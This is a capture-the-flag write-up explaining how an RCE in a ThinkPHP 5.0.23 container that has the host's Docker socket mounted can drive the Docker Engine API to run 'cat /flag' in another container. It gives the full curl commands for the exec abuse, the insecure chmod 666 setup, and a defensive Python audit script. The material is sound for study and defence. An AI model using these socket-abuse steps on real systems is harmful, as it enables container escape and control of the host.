What will happen if a Docker management system has an RCE vulnerability?
Testing environment (a simple CTF game)
- container_1: a ThinkPHP 5.0 web application (a simple Docker management system)
- container_2: another web application (the flag is in it)
0x01 What is Docker Engine API?
- Official docs:
- The Docker Engine API is a RESTful API accessed by an HTTP client such as wget or curl, or the HTTP library which is part of most modern programming languages.
- Examples
- Run a container:
$ curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "alpine", "Cmd": ["echo","hello world"]}' -X POST http:/ip:port/containers/create
{"Id":"container_id","Warnings":null}
$ curl --unix-socket /var/run/docker.sock -X POST http:/ip:port/containers/container_id/start
$ curl --unix-socket /var/run/docker.sock -X POST http:/ip:port/containers/container_id/wait
{"StatusCode":0}
$ curl --unix-socket /var/run/docker.sock "http:/ip:port/containers/container_id/logs?stdout=1"
hello world
- List and manage containers
$ curl --unix-socket /var/run/docker.sock http:/ip:port/containers/json
- Stop all running containers
$ curl --unix-socket /var/run/docker.sock http:/ip:port/containers/json
$ curl --unix-socket /var/run/docker.sock -X POST http:/ip:port/containers/container_id/stop
- List all images
$ curl --unix-socket /var/run/docker.sock http:/ip:port/images/json
- and so on
0x02 Something about the file /var/run/docker.sock
- Short answer: it's the Unix socket the Docker daemon listens on by default, and it can be used to communicate with the daemon from within a container.
- Examples
- Communicate with the daemon from within a container
- I've mounted the host's /var/run/docker.sock file into the container.
curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json
(run inside the container)
- Through the API, we can operate the Docker daemon from inside the container.
0x03 Build a test env
- container_1:
- mounted the host's /var/run/docker.sock file into the container
chmod 666 /var/run/docker.sock
(otherwise, the www-data user will not be able to access it)
- apache2 + php + a PHP app (the Docker management system)
- container_2:
- we need to operate on this container to get the flag
0x04 How can we get the flag?
- ThinkPHP 5.0.23 has an RCE vulnerability
- payload
- We can execute system commands through this vulnerability
- exec:
curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json
- container_1: (a ThinkPHP 5.0.23 web app)
- controller: Index.php
<?php
namespace app\index\controller;

class Index
{
    public function index()
    {
        // Ask the daemon, through the mounted socket, for the running containers.
        // The backticks run curl via the shell, as the web server user (www-data).
        $content = json_decode(`curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json`, true);
        $i = 1;
        //var_dump($content);
        echo "<h1>容器管理系统</h1>";
        echo "<h2>正在运行的容器:</h2>";
        // Each element is one entry of the GET /containers/json response.
        foreach ($content as $value) {
            echo '容器'.$i.'<br>';
            $i++;
            echo "Id:".$value['Id']."<br>";
            echo "Name:".$value['Names'][0]."<br><br>";
        }
    }
}
- container_2:
- we need to execute 'cat /flag' in container_2 while we are in container_1.
- what should we do?
- create an exec through the RCE in ThinkPHP 5.0.23
curl -s --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "DetachKeys": "ctrl-p,ctrl-q", "Tty": false, "Cmd": ["cat","/flag"], "Env": ["FOO=bar", "BAZ=quux"]}' http://localhost/containers/689c87c0befa/exec
- start the exec (the id in the URL is the "Id" returned by the create call; /exec/{id}/start only reads "Detach" and "Tty" from the body, the other fields are ignored)
curl -s --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "DetachKeys": "ctrl-p,ctrl-q", "Tty": false, "Cmd": ["date"], "Env": ["FOO=bar", "BAZ=quux"]}' http://localhost/exec/3c664f72279fe6623fcf023b60d74e34719853cfc657b1274c441f3edc3c18c6/start
- get the flag
- We can do almost anything through exec.
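As an added defender-side example (not code from this write-up), here is a small Python audit that reads the same GET /containers/json response the controller in 0x04 parses and reports every container with the daemon socket bind-mounted, plus a check for the chmod 666 step from 0x03. UnixHTTPConnection, socket_mounts and socket_world_accessible are hypothetical names; the API path and the Mounts, Names and Id fields are Docker's own, and SAMPLE is constructed data.

```python
import http.client
import json
import os
import socket
import stat

DOCKER_SOCK = "/var/run/docker.sock"

class UnixHTTPConnection(http.client.HTTPConnection):
    """HTTPConnection over the daemon's Unix socket; the host name is ignored."""
    def __init__(self, sock_path=DOCKER_SOCK):
        super().__init__("localhost")
        self.sock_path = sock_path
    def connect(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self.sock_path)

def list_containers(conn=None):
    """GET /containers/json, the same call the page's controller shells out to curl for."""
    conn = conn or UnixHTTPConnection()
    conn.request("GET", "/containers/json")
    return json.loads(conn.getresponse().read())

def socket_mounts(containers):
    """(name, short id, rw/ro) for each container with the daemon socket bind-mounted."""
    hits = []
    for c in containers:
        for m in c.get("Mounts", []):
            if m.get("Type") == "bind" and m.get("Source") == DOCKER_SOCK:
                mode = "rw" if m.get("RW") else "ro"
                hits.append((c["Names"][0].lstrip("/"), c["Id"][:12], mode))
    return hits

def socket_world_accessible(st_mode):
    """True when 'other' has read+write on the socket, i.e. after the chmod 666 in 0x03."""
    return bool(st_mode & stat.S_IROTH and st_mode & stat.S_IWOTH)

# Constructed sample in the shape of GET /containers/json for the page's two containers.
SAMPLE = [
    {"Id": "689c87c0befa" + "0" * 52, "Names": ["/container_2"], "Mounts": []},
    {"Id": "a1b2c3d4e5f6" + "0" * 52, "Names": ["/container_1"], "Mounts": [
        {"Type": "bind", "Source": DOCKER_SOCK, "Destination": DOCKER_SOCK, "RW": True}]},
]

if __name__ == "__main__":
    live = os.path.exists(DOCKER_SOCK)
    for name, cid, mode in socket_mounts(list_containers() if live else SAMPLE):
        print(f"{name} ({cid}) can drive the daemon through the socket ({mode})")
    if live:
        print("socket world-accessible:", socket_world_accessible(os.stat(DOCKER_SOCK).st_mode))
```

Run it on the host (where the socket exists) to see which containers can reach the daemon; without a socket it audits the constructed sample.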